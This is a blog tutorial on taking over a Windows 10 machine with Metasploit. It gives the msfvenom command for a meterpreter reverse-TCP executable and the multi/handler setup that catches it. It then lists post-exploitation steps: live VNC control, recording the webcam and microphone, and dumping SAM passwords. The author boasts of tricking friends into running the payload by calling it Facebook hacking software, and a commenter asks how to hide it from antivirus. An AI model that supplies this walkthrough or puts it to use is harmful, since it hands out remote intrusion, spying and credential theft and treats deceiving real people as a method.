Saturday, 4 February 2017

Metasploit Tutorial - 12 (hack WIN10/post exploit)

Steps and Instructions -

Today we will be hacking Windows 10 using Metasploit.

We will also do some basic post exploitation.

Requirement -

* Kali Linux

Some terms -

Payloads - Is a file used to make a reverse TCP connection to the target system.

Lets do it...

I am running two machines. One is Windows 10 and another is Kali Linux.

* First we will make a payload using msfvenom.

We will open a terminal and type in 

"msfvenom -p windows/meterpreter_reverse_tcp --platform windows -a x86 exe LHOST=(your IP) LPORT=4444 -o /root/Desktop/monks.exe"

Here the -p for payload

--platform is windows

LHOST should be your IP address.

/root/Desktop is the path where the file is kept.

monks.exe is the name of the payload.

This will take some time to make the payload.

You can do this hack without the payload. But we will do that in the next tutorial. Note that payload is only used to make a reverse TCP connection.

When you hit enter, you will get an error as above snapshot saying "No encoder or badchars specified, outputting raw payload".

Thats totally fine until your payload has a size of 957487 bytes. Make sure that payload is not empty.

Your payload should be on the Desktop

Now is the time to launch Metasploit.

* Open a terminal and type "msfconsole". This will give us a console to set up our handler.

To set up we need to go through a series of commands

"use multi/handler"

"set payload windows/meterpreter_reverse_tcp"

"set LHOST (your IP)"

"set LPORT 4444"


After the setup when we exploit, the process will be paused while it says "starting the payload handler"

Thats because the payload should be placed inside the target system and the target should double click on it.

Here you have to use your social engineering skills in order to place the payload inside the target system. Like I found this cool way where I uploaded the payload on MediaFire and told my friends that it is a Facebook hacking software. As expected they downloaded it and tried to run it.

It depends upon you how you make them execute it.

For now I will go to my windows 10 machine and double click on it

And when I come back to my Kali Machine

It says that we have an open session.

(Most people get stuck at "starting the payload handler...."
There are several reasons to get suck at this point. Stick to the end to read about troubleshooting)

OK. Now comes the post exploitation part.

We can run VNC to get live administration over the target.

* type "run vnc"

Just a tip guys. If you are running in VMware, dont do VNC. It will show you something like this

As you can see that it is totally fucked up.

Thats because it will show us the target machine which is physical and running a vmware machine. So its a mirror effect.

We can use commands like-

"getuid" for usernames

"sysinfo" for target specs

"run post/windows/gather/checkvm" to know if the target is real or virtual

"run post/windows/gather/enum_application" to see the running services in the target machine

Here is the list of programs running

We can look at the help menu by typing "help"

You will get lots of options. Like the one here with web cams

Here you can record mic, webcam chat, take snaps or stream it live.

You can dump the passwords from SAM database.

Lots of options for post exploitation.

I have done it on LAN. But if you wish to do it on WAN then you have to port forward your router and listen to that open port.

Troubleshoot it -

If your handler is on halt after "starting the payload handler....".

There can be many reasons. Like -

* The target has not clicked on the payload and ran it.

* If you are doing it on VMware where the payload doesn't work on few Operating systems.

I used have this same problem when I had VMware running on win 8. It didn't have VM0 adapter in Vmware function. That will not let you connect to a reverse tcp connection.

* When you are doing it on WAN. Its a complicated shit.

Thank you guys for reading this tutorial.

You may want to see my other tutorials on Metasploit-


  1. Dude, invaild payload selected error

    1. You haven't entered the right exact command. Copy paste the command from above tutorial. Be sure to use msfvenom in Kali Linux 2

  2. [-] Could not execute vnc: Rex::Post::Meterpreter::RequestError "stdapi_sys_process_execute: Operation failed: Access is denied."
    that's what i get. plus i notice that the payload is easily detected by google if ii try to send it by email. if i use a thumb drive, avast stops it from being executed, identifying it as a virus. not a very practical hack seeing as the default security settings are enough to deter it. or is there a way to cloak it better?